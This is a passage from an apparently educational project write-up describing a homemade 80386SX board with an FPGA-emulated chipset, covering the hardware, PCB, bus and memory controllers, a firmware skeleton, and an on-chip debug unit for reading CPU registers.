Intel 80386SX CPU and an Altera Cyclone IVEP4CE22E22 FPGA in order to
emulate a custom chipset.

The main goal of this project is to create a simple, debuggable and customisable
version of the well-known PC hardware architecture. Its purpose is mainly
didactic for students or experienced developers who want to get started into x86
low-level programming.

Hardware Overview

The schematics were designed using gschem which
is a part of the gEDA project. Although the provided component library is
acceptable, most of the chips used on this board are outlandish and so need to
be drawn before starting overall schematics. This rude work was achieved by
using
djboxsym tool
which allows quick production of gschem symbols from a minimal description.

Central Processing Unit

The CPU used on this board is a 80386SX designed by Intel and released in
1986. It is basically a cut-down version of the original 386 with a 16-bit
physical data bus. Although memory access performance is hardly affected, it is
still fully 32-bit internally and was designed to be used in a 16-bit
environment which is simpler and cheaper to design that a full 32-bit
compatible motherboard. The physical address bus is only 24-bit which limits
address space to 16MB.

The model used here is an NG80386SXLP20 which is a low power version
clocked at 20MHz and packaged in a 100-pin Plastic Quad Flat pack. Of course,
this chip is today considered obsolete but is still the only 32-bit x86 CPU
which is simple enough to be integrated in an amateur board.

Field-Programmable Gate Array

The main criterion for choosing an appropriate FPGA was about packaging.
Knowing that this chip will be hand-soldered, selecting a Ball Grid Array based
component was inconceivable. I'm also quite used to work with Altera's FPGA so
one from the Cyclone IV series was a good compromise. The model chosen is an
EP4CE22E22C7N released in 2009. With its 22320 logic elements, it is one of
the largest FPGA available on EQFP. This package, only used by Altera, is an
enhanced version of the standard plastic quad flat package which uses a step of
0.5 millimeter between each pins. This layout allows the FPGA to expose 144 pins
where 62 can be used as I/O and 15 as clock inputs.

An other useful feature is the 3.3V PCI compliant mode of the IO banks.
It provides compatibility with 5V devices by enabling a clamping diode which can
supports 25mA. This explains the use of 120 Ohms resistors between CPU 5V
signals and FPGA IO.

The CPU needs a 20MHz input clock to operate correctly. A unique oscillator is
used to clock CPU and FPGA. The idea here is to assume that if the FPGA needs a
higher clock speed, the use of an internal Phase Locked Loop will be considered
to obtain the desired frequency from this 20MHz clock.

FPGA programming and debugging can be performed through JTAG. Altera provides
a dedicated programmer called the USB Blaster which can be easily used with
Quartus II. It provides a standard 10-pin connector and operates here at 2.5V.

As FPGA configuration is volatile, it is necessary to provide an external way
to program it when the board is powered on. Here this is achieved by an external
serial flash which contains the whole FPGA configuration. Altera sells EPCQ
devices which are dedicated to that purpose. However, most of the time those
are expensive and it turns out that they are nothing more than SPI flash
memories.
That is why it has been decided to use an M25P16, a 16Mbits flash memory from
Micron which perfectly do the job.

In fact, several programming modes are available in this FPGA. In order to
indicate what mode has to be used, MSEL pins must be pulled-up or pulled-down
to encode the mode number. To select the Active Serial Programming mode, it is
necessary to solder 120 Ohms resistors on R77, R79 and R81.

USB/UART bridge

In addition to JTAG, it can be a good idea to provide USB connectivity to this
design. However, implementing USB protocol stack in an FPGA can be really
painful. The purpose of the FT230X chip is to provide a simple bridge between
an USB and an UART interface which is simpler to implement in an FPGA. It is
provided in a SSOP16 package and is really simple to wire thanks notably to the
fully integrated clock generation which does no require an external crystal.

Static Random Access Memory

For the main RAM, AS6C8016 from Alliance Memory has been chosen. This is a
512K x 16-bit CMOS static RAM packaged in a 44-pin TSOP. It features tri-state
output and data byte control (LB and UB signals) as required by the
80386SX.

Although this chip was originally designed to be used as a battery backed-up
non-volatile memory, its usage simplicity and its response time justify the low
storage space. So 1MB ought to be enough for anybody. Also, AS6C8016 is
powered by 5V but is still fully TTL compatible which means that it can be
driven by the CPU as well as the 3.3V outputted by FPGA's IO. So control signals
as RAMCS and RAMWE are only driven by the FPGA which will perform address
decoding.

Voltage Regulation

The power circuitry has to provide four sources of different voltages:

5V: CPU, SRAM

3.3V: FPGA In/Out

2.5V: FPGA Analog PLL

1.2V: FPGA internal logic, Digital PLL

Regulation is achieved by three fixed low drop positive voltage regulators which
operate from the 5V supplied by the USB. Even though fixed regulators are often
more expensive that adjustable regulators, they are easier to wire and reduce
the number of passive components needed to perform adjustment. Only 250mA are
provided for 2.5V because it is only used by FPGA Analog PLL and JTAG target
voltage.

Routing and Manufacturing the Printed Circuit Board

Once the schematics completed, PCB has to be designed. This process has been
assisted by pcb, an other part of gEDA project.
As schematics and PCB designs are not performed using the same software (as
KiCad or Eagle do), synchronization between those is ensured thanks to the
gsch2pcb tool.

As some components on the board do not use standard packages, creating custom
pcb footprint for those chip is necessary. Like symbols generation,
footprints was generated using
footgen.

The PCB routing here is a bit tricky due to the large number of signals needed
to drive the CPU. A 4-layer PCB is unavoidable in order to achieve routing and
to preserve signal integrity. As our manufacturer limits 4-layer board 5 x
10cm, this is the dimension adopted which is large enough for this design.

Each layer has a dedicated purpose:

Top layer : it is mainly used for signals routing. Traces used for data
signal are 0.20mm width which is the limit imposed by manufacturer. Unused
spaces are recycled to ground planes. FPGA, CPU and voltage regulators are
soldered on this layer.

Ground layer : Used almost exclusively to get a common ground plane in the
whole circuit. It has also been used to complete RAM routing.

Power layer : Dedicated to conduct power rails through the board. Four areas
corresponding to each voltage level can be clearly seen on this layer.

Bottom layer : Like the top layer, this is mainly used for signals routing.
Capacitors used to apply local filtering are soldered on this side as well
as SRAM and 20MHz oscillator.

With a low end SMD soldering station, it takes approximately three hours to
solder a whole board.

In addition to PCB, acrylic case was designed using
FreeCAD and then manufactured.

Emulating a rudimentary chipset

Now that the board is correctly soldered, the last thing to do before being able
to run code on the CPU is to configure the FPGA in order to emulate a basic
chipset. The design is composed of two parts : the bus controller and the memory
controller.

Bus Controller

The bus controller has to handle 80386SX bus access protocol. In order to
understand the exact purpose of it, it is necessary to detail signals involved
in the process.

The Data Bus (D[15:0]) is composed of three-state bidirectional signals
providing a general purpose data path between 386 and other devices (such
as memory).

The Address Bus (A[23:1], BHE#, BLE#) is composed of three-state
outputs providing physical memory addresses or I/O port addresses. The Byte
Enable outputs (BHE# and BLE#) indicate which bytes of the 16-bit data
bus are involved with the current transfer. If both of them are asserted,
then 16 bits word is being transferred,

A Bus Cycle is defined by W/R#, D/C#, M/IO# and LOCK# three-state
outputs. W/R# distinguishes between write and read cycles, D/C#
distinguishes between data and control cycles, M/IO# distinguishes between
memory and I/O cycles and #LOCK indicates if the current operation is
atomic or not.

The Bus Access is controlled by ADS#, READY# and NA#.
The Address Status (ADS#) indicates that a valid bus cycle definition
and address are being driven from the 386 pins. Most of the bus controller
logic must be based on the falling-edge of this signal. READY# signal
indicates a transfer acknowledge driven by the bus controller to the 386.
NA# signal is used to request address pipelining which is not relevant in
this case.

As an example, here is a waveform of bus signals during these operations :

Write data1 to address1

Read data2 from address2

Write data3 to address3

Idle

Read data4 from address4

Each bus access operates in two steps. The first one, indicated by ADS# is
used to drive Bus Cycle Definition signals and an address. The second one take
place during the next rising edge of the main clock. Depending on the W/R# pin
state, the data bus is driven with the value the CPU wants to write. During all
these sequences ADS# is still asserted.

The next bus cycle is performed when the 386 detects a falling edge on the
READY# signal. So the bus controller can be easily modeled as the following
Finite-State Machine :

As data bus is bidirectional, it is sometimes necessary to set it in high
impedance in order to let another device driving the bus. It is also needed to
respect bytes requested by the CPU via BHE# and BLE#.

Memory Controller

Once the bus protocol is properly respected, the address requested by the CPU
must be decoded in order to figure out which device must be selected. This is
here the purpose of the memory controller unit.

Altera Cyclone IV devices features embedded memory structures. It consists of
M9K memory blocks that can be configured to provide various memory functions,
such as RAM, shift registers or ROM. The idea here is to use it to create a
small memory which is initialized with a basic piece of code dedicated to CPU
initialization. An other useful feature of this memory is to be easily readable
and editable through JTAG using the In-System Content Editor provided by
Quartus II.

Basically, the main address space is composed of two memories : an external (i.e.
the SRAM) and an internal (i.e. the M9K blocks).

The first megabyte of addressable memory is organized as the layout of the
traditional IBM-PC. It means that only the first 640K of external memory are
mapped from 0x000000 to 0x0A0000 and BIOS shadow ROM (implemented here
with internal memory) is mapped from 0x0F8000 to 0x100000. Shadow ROM was
originally a 64KB memory which contains a copy of the BIOS ROM mapped on the
last 64KB of the address space. As the CPU starts fetching instructions at
0xFFFFF0 after a reset, the mechanism consists of mapping a ROM at this
address, copying ROM content on the shadow ROM and then jumping on a subroutine
located on the first megabyte.

Here, the internal RAM is only 32KB due to the FPGA limitations and is located
at 0xFF8000 and 0x0F8000 which allows simulation of the original machinery.
Moreover, the whole SRAM is mapped from 1MB which means that first 640KB of
external RAM are mapped twice.

Memory controller unit can be simplified as :

The actual address space layout is achieved by applying a logic expression
to the chip select signal of each memory. Notice that WE# signal of SRAM
is not active on the same level that W/R#386 signal. So this signal is
inverted by the FPGA.

Skeleton of a basic firmware

As an example, this section will present a basic firmware which can be run on
the LSE-PC.

Firstly, it is considered here that the entire firmware will be located on the
internal memory which is automatically initialized when the design is loaded
into the FPGA.

On reset, the 80386 CPU is running in real mode and will start to execute
the instructions located at the end of the address space: 0xFFFFF0. So the
purpose of these instructions are to jump to the first megabyte by reloading
Code Segment. However, the last 16 bytes can be used to set a minimal
environment to allow 16-bit application execution. The following code is an
example of 5 instructions that can be assembled to 16 bytes of opcodes. It
basically sets Data, Stack and Code Segment Selector, sets the stack
pointer and then jumps to the beginning of the internal ram mapped at
0x8000.

Now that the execution flow has exited the reset state, it is now possible to
set the CPU to protected mode. This can be achieved by loading a simple Global
Descriptor Table which defines memory segments that will be used in protected
mode. Notice that the jump to reload_segs is used to flush instruction
the prefetch queue after enabling protected mode in order to validate segment
reloading. This code can be improved by the setting of an
Interrupt Descriptor Table in addition of a Global Descriptor Table.

A 32-bit application can then be located at 0xF8400. The internal RAM is
segmented according to the following layout :

As the In-Sytem Memory Content Editor accepts a special binary format called
MIF (Memory Initialization File), a dedicated OCaml script has been created
to facilitate linking of several raw binary object files.

Providing debug facilities

Even though Altera's FPGA provide an efficient internal signal analyser thanks
to SignalTap, it is a real pain to make software debugging when the size
of applications running on the 386 become significant. Adding a flexible
on-chip debug facility based on the UART communication to this design is one of
the main challenge of this project.

Supervisor

The supervisor is designed using Altera's QSys tool which assists the creation
of systems based on the NIOS II soft-processor. This system is composed of a
private on-chip memory which contains NIOS instructions and data, and of an
UART which is connected to FT230X chip.

The protocol between the host and the supervisor is pretty simple and it
considers that the CPU is at any time in one of these states :

STOP : CPU is stopped. RESET signal is asserted.

RUN : CPU is running.

IORD / IOWR : CPU is trying to perform an access to IO ports. Distinction
between read and write operation is done. Those states are used to allow
device emulation.

It is accurate to implement the protocol logic through NIOS software instead
of having it hardwired in Verilog. However, directly handling 386 signals on
the NIOS is inefficient due to execution speed of this system. The idea here
is to export the 386 signal handling job to an other module dedicated to it :
the On-Chip Debug Unit.

The OCD Unit can take the control of 386 buses at anytime by asserting the
ocd.en signal, which disable the original bus controller described before.
The communication between those two units is ensured by a dual-port shared
memory accessible through Avalon bus and two PIO registers. The first one,
OCD_CTL, is used to reset the OCD Unit from supervisor. The second,
OCD_STATUS indicates if the unit is running or not. The shared memory
contains a routine that must be applied on 386.

On-Chip Debug Unit

This unit is basically a processor specially designed to handle 386 signals.
It fetches its instructions from the 256 x 16-bit Avalon memory filled by the
supervisor and operates on a 16 x 16-bit data space also located on shared
memory.

While supervisor can access OCD program and data unrestrictedly, the
OCD Unit can only operates on its data space which corresponds to offset
0x100 from supervisor point of view. In the dedicated assembler, data memory
is addressed using R1 to R15 naming convention.

Implementing this kind of processor is quite simple and a basic one will be
based on the following state machine :

As Avalon memory signals are always latched, reading on it takes two clock
cycles : the first cycle is used to latch the address value and the second one
latches the result on the data bus. Taking that into account, execution of a
single instruction which reads and writes on data memory cannot take less than
five clock cycles.

STORE : Store result and compute next address of the next instruction.

LATCH : Latch instruction address into program memory.

Instruction set is composed of several categories. The first one is used to
control the OCD :

ATTACH/DETACH : Connect/Disconnect the OCD unit to 386 signals.

The second category includes instructions related to 386 signals processing :

LDD d : Load data bus value into d register.

LDAL d / LDAH d : Load address bus value into d register.

LDWR d : Load W/R# signal into d register.

LDDC d : Load D/C# signal into d register.

LDMIO d : Load M/IO# signal into d register.

STD s : Set data bus value to s register value.

START/RESET : Start/Reset the CPU.

READY : Assert READY# signal.

Of course, some instructions only operate on registers :

LDI d, imm16 : Load a 16-bit immediate into d register.

MOV d, s : Move s register value into d register.

CLR d : Clear d register.

Third category is about flow control. As the data memory only exposes one port
to the OCD Unit, implementing a compare instruction which loads two
registers is not possible in a single cycle. So a compare register as been
added to the core. All comparisons will be related to that register.

LDCMP s : Load s register value into the compare register.

CMP s : Compare s register value with compare register value and store
the result into the compare register.

BA/BEQ/BNE addr : Branch to the specified address according to
compare register value.

As example, those instructions performs a jump to label if R1 is equal to R2 :

This wait state mechanism is also used to implement instructions used to wait
for a particular event on the bus. All those instructions deassert READY#
signal and attach the OCD to the 386 when the expected condition is
triggered.

WAITADS : Wait for ADS# signal to be asserted

WAITIO : Wait for ADS# and M/IO# getting low

WAITLOCK : Wait for ADS# and LOCK# to be asserted

The block diagram of this unit can be represented as :

Here is routines used to reset and start the CPU from OCD Unit. Notice that
the start routine let the original bus controller operates on the 386 until
an IO access is performed. The supervisor has just to be interrupted when the
OCD is exited from the start routine to handle the IO request. Devices can
then be emulated by the supervisor or by the host.

Example : Obtaining CPU registers

Now that the OCD Unit internals have been presented, the purpose now is to use
it to get CPU registers.

Before applying debug operations on the CPU, it is necessary to stop execution
and set it up in a known state. The simplest method to interrupt a 386
without having to mind about the interrupt flag is to send a Non
Maskable Interrupt. Unlike INTR signal, NMI mechanism does not provide any
acknowledge from the CPU. So the way only to know if the CPU actually took into
account the NMI is to wait LOCK# signal assertion. Indeed, the 386 locks
the whole bus when it accesses an IDT or IVT entry. The WAITLOCK
instruction has been designed for that specific purpose.

On the next step, the behaviour of the CPU is different according to its mode.
If the 386 is still in real mode, it will fetch the code segment and the
offset of the NMI handler located on the Interrupt Vector Table. As IVT
always starts at 0x0000000, the address 0x0000008 will be outputted after
triggering the NMI.

In the other hand, if protected mode is enabled, the CPU will fetch an
Interrupt Descriptor corresponding of the NMI interrupt. This structure is
located on the Interrupt Descriptor Table which can be found anywhere on the
address space.

As the processor mode is unknown at that moment, it can be deduced from the
first requested address after NMI :

Finally, as EFLAGS, EIP and CS registers have been modified, they are
pushed on the stack. However the bus controller is disconnected from CPU
signals : this means that no actual write on the memory are performed during
this operation. Instead, it is straightforward to load those values into OCD
registers :

Afterwards, the CPU will try to fetch instructions from the interrupt handler.
So HOLD signal is asserted at the end of the break routine. This leaves the
supervisor time to load the next routine to the OCD program memory.

At this point, 386 is on a known and valid state which allows us to inject
any instructions sequences. In order to obtain CPU registers, the pusha
instruction can be injected :